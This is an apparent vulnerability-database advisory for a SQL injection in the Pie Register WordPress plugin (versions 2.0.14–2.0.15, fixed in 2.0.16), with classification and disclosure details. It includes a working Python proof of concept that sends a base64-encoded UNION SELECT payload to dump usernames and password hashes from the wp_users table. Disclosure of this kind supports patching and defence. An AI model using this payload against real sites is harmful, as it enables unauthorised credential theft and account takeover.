Pie Register 2.0.14-2.0.15 - SQL Injection
Sign up to our free email alerts service for instant vulnerability notifications!| Description | User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ are provided to any page, by any user (anonymous or otherwise). |
| Proof of Concept | import requests,base64,re
url="http://localhost"
query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query)
params = {
"show_dash_widget":1,
"invitaion_code":query_encoded
}
r = requests.get(url, params=params)
print re.search(r"<tr><td>([^<]*?)<", r.text).group(1) |
Affects
| Plugin |
pie-register
fixed in version 2.0.16
|
References
| URL | https://research.g0blin.co.uk/g0blin-00040/ |
Classification
| Type | SQLI |
| OWASP Top 10 | A1: Injection |
| CWE | CWE-89 |
Miscellaneous
| Submitter | James Hooker |
| Submitter Website | https://research.g0blin.co.uk |
| Submitter Twitter | g0blinResearch |
| Views | 189 |
| Verified | No |
| WPVDB ID | 7958 |
Timeline
| Publicly Published | 2015-05-04 (over 2 years ago) |
| Added | 2015-05-04 (over 2 years ago) |
| Last Updated | 2015-07-04 (about 2 years ago) |
Copyright & License
| Copyright | All data and resources contained within this page and this web site is Copyright © The WPScan Team. |
| License | Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us. |
